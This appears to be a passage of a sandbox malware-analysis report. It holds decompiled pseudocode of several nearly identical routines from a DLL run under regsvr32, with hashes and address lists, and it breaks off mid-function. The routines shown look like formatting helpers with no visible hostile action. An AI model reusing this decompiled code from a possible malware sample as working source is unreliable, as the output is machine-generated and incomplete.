                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bcbb810e85e5b155dcc7dfa1c16070e8aee46223b0b4c2bf038904d2d06741ff
                                                                      • Instruction ID: fc1978c94eae257c39893a6f40b89b00ce1af1dc55e893c7b21585b7954c45b9
                                                                      • Opcode Fuzzy Hash: bcbb810e85e5b155dcc7dfa1c16070e8aee46223b0b4c2bf038904d2d06741ff
                                                                      • Instruction Fuzzy Hash: F2519372118A4896FBA78E78C0543EC3360F74EBDCF158219FA5A4B6D9CF25CA4AC701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001A6EC(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t161;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001a7cb;
                                                                      				if (_t109 == 0) goto 0x8001a745;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001a81f;
                                                                      				if (_t110 == 0) goto 0x8001a79b;
                                                                      				if (_t110 == 0) goto 0x8001a76c;
                                                                      				if (_t110 == 0) goto 0x8001a81f;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001a7eb;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001a848;
                                                                      				E00000001180023AF8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001a84d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001a791;
                                                                      				_t70 = E000000011800236DC( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001a84d;
                                                                      				E000000011800237E4(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001a84d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001a7c1;
                                                                      				_t74 = E000000011800234CC( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001a84d;
                                                                      				E000000011800235D4(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001a84d;
                                                                      				if (_t114 == 0) goto 0x8001a745;
                                                                      				if (_t114 == 0) goto 0x8001a745;
                                                                      				if (_t114 == 0) goto 0x8001a745;
                                                                      				goto 0x8001a733;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001a8fd;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001a841;
                                                                      				_t80 = E000000011800238EC( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001a84d;
                                                                      				_t81 = E000000011800239F4(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001a84d;
                                                                      				E00000001180023C00(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001a818;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001a867;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001a8fb;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001a885;
                                                                      				if (_t152 >= 0) goto 0x8001a885;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001a894;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001a8ab;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				E0000000118001A174(_t131, _t131 + 0x50,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001a8b4;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t161 != _t161) goto 0x8001a8cd;
                                                                      				E00000001180023D08(_t131, _t153);
                                                                      				goto 0x8001a8d4;
                                                                      				E00000001180023D94(__esi, _t131, _t153);
                                                                      				if (0 == 0) goto 0x8001a8fb;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001a8ed;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001a8fb;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001a6ec
                                                                      0x18001a6f1
                                                                      0x18001a6f6
                                                                      0x18001a707
                                                                      0x18001a70a
                                                                      0x18001a70d
                                                                      0x18001a710
                                                                      0x18001a716
                                                                      0x18001a719
                                                                      0x18001a71f
                                                                      0x18001a721
                                                                      0x18001a723
                                                                      0x18001a72c
                                                                      0x18001a731
                                                                      0x18001a736
                                                                      0x18001a73f
                                                                      0x18001a74c
                                                                      0x18001a75c
                                                                      0x18001a762
                                                                      0x18001a767
                                                                      0x18001a773
                                                                      0x18001a785
                                                                      0x18001a787
                                                                      0x18001a78c
                                                                      0x18001a791
                                                                      0x18001a796
                                                                      0x18001a7a2
                                                                      0x18001a7b2
                                                                      0x18001a7b5
                                                                      0x18001a7b7
                                                                      0x18001a7bc
                                                                      0x18001a7c1
                                                                      0x18001a7c6
                                                                      0x18001a7ce
                                                                      0x18001a7d7
                                                                      0x18001a7e0
                                                                      0x18001a7e6
                                                                      0x18001a7eb
                                                                      0x18001a7ef
                                                                      0x18001a7f2
                                                                      0x18001a7f9
                                                                      0x18001a7fd
                                                                      0x18001a808
                                                                      0x18001a80d
                                                                      0x18001a813
                                                                      0x18001a81a
                                                                      0x18001a826
                                                                      0x18001a838
                                                                      0x18001a83a
                                                                      0x18001a83f
                                                                      0x18001a841
                                                                      0x18001a846
                                                                      0x18001a848
                                                                      0x18001a84f
                                                                      0x18001a858
                                                                      0x18001a861
                                                                      0x18001a86c
                                                                      0x18001a875
                                                                      0x18001a87a
                                                                      0x18001a87c
                                                                      0x18001a87f
                                                                      0x18001a882
                                                                      0x18001a889
                                                                      0x18001a88b
                                                                      0x18001a892
                                                                      0x18001a89f
                                                                      0x18001a8a6
                                                                      0x18001a8ae
                                                                      0x18001a8b0
                                                                      0x18001a8b4
                                                                      0x18001a8b8
                                                                      0x18001a8c1
                                                                      0x18001a8c6
                                                                      0x18001a8cb
                                                                      0x18001a8cf
                                                                      0x18001a8dc
                                                                      0x18001a8e2
                                                                      0x18001a8eb
                                                                      0x18001a8ed
                                                                      0x18001a8f5
                                                                      0x18001a8f8
                                                                      0x18001a915

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30f4ab9c59f9f17dc7b7be72886e8705140f74da6638b68f5265d62d52882f90
                                                                      • Instruction ID: 59fb016b630c082b9d28ad91073224099d6ba6116c5e36ba161a721274f103d9
                                                                      • Opcode Fuzzy Hash: 30f4ab9c59f9f17dc7b7be72886e8705140f74da6638b68f5265d62d52882f90
                                                                      • Instruction Fuzzy Hash: BF51A472118A4986F7AB9E28C4153EC27A0E74EBDCF158215FA4A0B6C9CF25CA4FC740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001C88C(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t161;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001c96b;
                                                                      				if (_t109 == 0) goto 0x8001c8e5;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001c9bf;
                                                                      				if (_t110 == 0) goto 0x8001c93b;
                                                                      				if (_t110 == 0) goto 0x8001c90c;
                                                                      				if (_t110 == 0) goto 0x8001c9bf;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001c98b;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c9e8;
                                                                      				E00000001180025BA8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c9ed;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c931;
                                                                      				_t70 = E0000000118002578C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c9ed;
                                                                      				E00000001180025894(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001c9ed;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001c961;
                                                                      				_t74 = E0000000118002557C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c9ed;
                                                                      				E00000001180025684(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001c9ed;
                                                                      				if (_t114 == 0) goto 0x8001c8e5;
                                                                      				if (_t114 == 0) goto 0x8001c8e5;
                                                                      				if (_t114 == 0) goto 0x8001c8e5;
                                                                      				goto 0x8001c8d3;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001ca9d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001c9e1;
                                                                      				_t80 = E0000000118002599C( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001c9ed;
                                                                      				_t81 = E00000001180025AA4(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001c9ed;
                                                                      				E00000001180025CB0(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001c9b8;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001ca07;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001ca9b;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001ca25;
                                                                      				if (_t152 >= 0) goto 0x8001ca25;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001ca34;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001ca4b;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				E0000000118001A174(_t131, _t131 + 0x50,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001ca54;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t161 != _t161) goto 0x8001ca6d;
                                                                      				E00000001180025DB8(_t131, _t153);
                                                                      				goto 0x8001ca74;
                                                                      				E00000001180025E44(__esi, _t131, _t153);
                                                                      				if (0 == 0) goto 0x8001ca9b;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001ca8d;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001ca9b;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001c88c
                                                                      0x18001c891
                                                                      0x18001c896
                                                                      0x18001c8a7
                                                                      0x18001c8aa
                                                                      0x18001c8ad
                                                                      0x18001c8b0
                                                                      0x18001c8b6
                                                                      0x18001c8b9
                                                                      0x18001c8bf
                                                                      0x18001c8c1
                                                                      0x18001c8c3
                                                                      0x18001c8cc
                                                                      0x18001c8d1
                                                                      0x18001c8d6
                                                                      0x18001c8df
                                                                      0x18001c8ec
                                                                      0x18001c8fc
                                                                      0x18001c902
                                                                      0x18001c907
                                                                      0x18001c913
                                                                      0x18001c925
                                                                      0x18001c927
                                                                      0x18001c92c
                                                                      0x18001c931
                                                                      0x18001c936
                                                                      0x18001c942
                                                                      0x18001c952
                                                                      0x18001c955
                                                                      0x18001c957
                                                                      0x18001c95c
                                                                      0x18001c961
                                                                      0x18001c966
                                                                      0x18001c96e
                                                                      0x18001c977
                                                                      0x18001c980
                                                                      0x18001c986
                                                                      0x18001c98b
                                                                      0x18001c98f
                                                                      0x18001c992
                                                                      0x18001c999
                                                                      0x18001c99d
                                                                      0x18001c9a8
                                                                      0x18001c9ad
                                                                      0x18001c9b3
                                                                      0x18001c9ba
                                                                      0x18001c9c6
                                                                      0x18001c9d8
                                                                      0x18001c9da
                                                                      0x18001c9df
                                                                      0x18001c9e1
                                                                      0x18001c9e6
                                                                      0x18001c9e8
                                                                      0x18001c9ef
                                                                      0x18001c9f8
                                                                      0x18001ca01
                                                                      0x18001ca0c
                                                                      0x18001ca15
                                                                      0x18001ca1a
                                                                      0x18001ca1c
                                                                      0x18001ca1f
                                                                      0x18001ca22
                                                                      0x18001ca29
                                                                      0x18001ca2b
                                                                      0x18001ca32
                                                                      0x18001ca3f
                                                                      0x18001ca46
                                                                      0x18001ca4e
                                                                      0x18001ca50
                                                                      0x18001ca54
                                                                      0x18001ca58
                                                                      0x18001ca61
                                                                      0x18001ca66
                                                                      0x18001ca6b
                                                                      0x18001ca6f
                                                                      0x18001ca7c
                                                                      0x18001ca82
                                                                      0x18001ca8b
                                                                      0x18001ca8d
                                                                      0x18001ca95
                                                                      0x18001ca98
                                                                      0x18001cab5

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 248df4be3de0a015fa530fba8d26e53df6f2768479b8f3e3e5ba003b918a05fe
                                                                      • Instruction ID: d986b0dc10e8ff51f8c45cbbeed960bd40d38bb73b4e4b7b1deda0b0f4640747
                                                                      • Opcode Fuzzy Hash: 248df4be3de0a015fa530fba8d26e53df6f2768479b8f3e3e5ba003b918a05fe
                                                                      • Instruction Fuzzy Hash: 02518272104A4C86FBA7CE29C059BEC27A0E70DBDCF158215FA464B699CF35CA49C74B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001A918(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t161;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001a9f7;
                                                                      				if (_t109 == 0) goto 0x8001a971;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001aa4b;
                                                                      				if (_t110 == 0) goto 0x8001a9c7;
                                                                      				if (_t110 == 0) goto 0x8001a998;
                                                                      				if (_t110 == 0) goto 0x8001aa4b;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001aa17;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001aa74;
                                                                      				E00000001180023AF8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001aa79;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001a9bd;
                                                                      				_t70 = E000000011800236DC( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001aa79;
                                                                      				E000000011800237E4(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001aa79;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001a9ed;
                                                                      				_t74 = E000000011800234CC( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001aa79;
                                                                      				E000000011800235D4(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001aa79;
                                                                      				if (_t114 == 0) goto 0x8001a971;
                                                                      				if (_t114 == 0) goto 0x8001a971;
                                                                      				if (_t114 == 0) goto 0x8001a971;
                                                                      				goto 0x8001a95f;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001ab29;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001aa6d;
                                                                      				_t80 = E000000011800238EC( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001aa79;
                                                                      				_t81 = E000000011800239F4(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001aa79;
                                                                      				E00000001180023C00(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001aa44;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001aa93;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001ab27;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001aab1;
                                                                      				if (_t152 >= 0) goto 0x8001aab1;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001aac0;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001aad7;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				_t48 = _t131 + 0x50; // 0xc8
                                                                      				E0000000118001A174(_t131, _t48,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001aae0;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t161 != _t161) goto 0x8001aaf9;
                                                                      				E00000001180023E20(0, _t131, _t153);
                                                                      				goto 0x8001ab00;
                                                                      				E00000001180023E9C(__esi, _t131);
                                                                      				if (0 == 0) goto 0x8001ab27;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001ab19;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001ab27;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001a918
                                                                      0x18001a91d
                                                                      0x18001a922
                                                                      0x18001a933
                                                                      0x18001a936
                                                                      0x18001a939
                                                                      0x18001a93c
                                                                      0x18001a942
                                                                      0x18001a945
                                                                      0x18001a94b
                                                                      0x18001a94d
                                                                      0x18001a94f
                                                                      0x18001a958
                                                                      0x18001a95d
                                                                      0x18001a962
                                                                      0x18001a96b
                                                                      0x18001a978
                                                                      0x18001a988
                                                                      0x18001a98e
                                                                      0x18001a993
                                                                      0x18001a99f
                                                                      0x18001a9b1
                                                                      0x18001a9b3
                                                                      0x18001a9b8
                                                                      0x18001a9bd
                                                                      0x18001a9c2
                                                                      0x18001a9ce
                                                                      0x18001a9de
                                                                      0x18001a9e1
                                                                      0x18001a9e3
                                                                      0x18001a9e8
                                                                      0x18001a9ed
                                                                      0x18001a9f2
                                                                      0x18001a9fa
                                                                      0x18001aa03
                                                                      0x18001aa0c
                                                                      0x18001aa12
                                                                      0x18001aa17
                                                                      0x18001aa1b
                                                                      0x18001aa1e
                                                                      0x18001aa25
                                                                      0x18001aa29
                                                                      0x18001aa34
                                                                      0x18001aa39
                                                                      0x18001aa3f
                                                                      0x18001aa46
                                                                      0x18001aa52
                                                                      0x18001aa64
                                                                      0x18001aa66
                                                                      0x18001aa6b
                                                                      0x18001aa6d
                                                                      0x18001aa72
                                                                      0x18001aa74
                                                                      0x18001aa7b
                                                                      0x18001aa84
                                                                      0x18001aa8d
                                                                      0x18001aa98
                                                                      0x18001aaa1
                                                                      0x18001aaa6
                                                                      0x18001aaa8
                                                                      0x18001aaab
                                                                      0x18001aaae
                                                                      0x18001aab5
                                                                      0x18001aab7
                                                                      0x18001aabe
                                                                      0x18001aacb
                                                                      0x18001aace
                                                                      0x18001aad2
                                                                      0x18001aada
                                                                      0x18001aadc
                                                                      0x18001aae0
                                                                      0x18001aae4
                                                                      0x18001aaed
                                                                      0x18001aaf2
                                                                      0x18001aaf7
                                                                      0x18001aafb
                                                                      0x18001ab08
                                                                      0x18001ab0e
                                                                      0x18001ab17
                                                                      0x18001ab19
                                                                      0x18001ab21
                                                                      0x18001ab24
                                                                      0x18001ab41

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a9f8ff8f796362ee5d56d0a5fd1b1aad67281663c02e71b846f1c8c2192be515
                                                                      • Instruction ID: a7e337ae54ba656e0b6fb5c636e50ad0e215c86241344d55ca5f3d7952630761
                                                                      • Opcode Fuzzy Hash: a9f8ff8f796362ee5d56d0a5fd1b1aad67281663c02e71b846f1c8c2192be515
                                                                      • Instruction Fuzzy Hash: A951B472108A4886FBA78E69C1553ED37A1E70EBDCF158216FA4A0B7D9CF25CA49C701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001CAB8(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
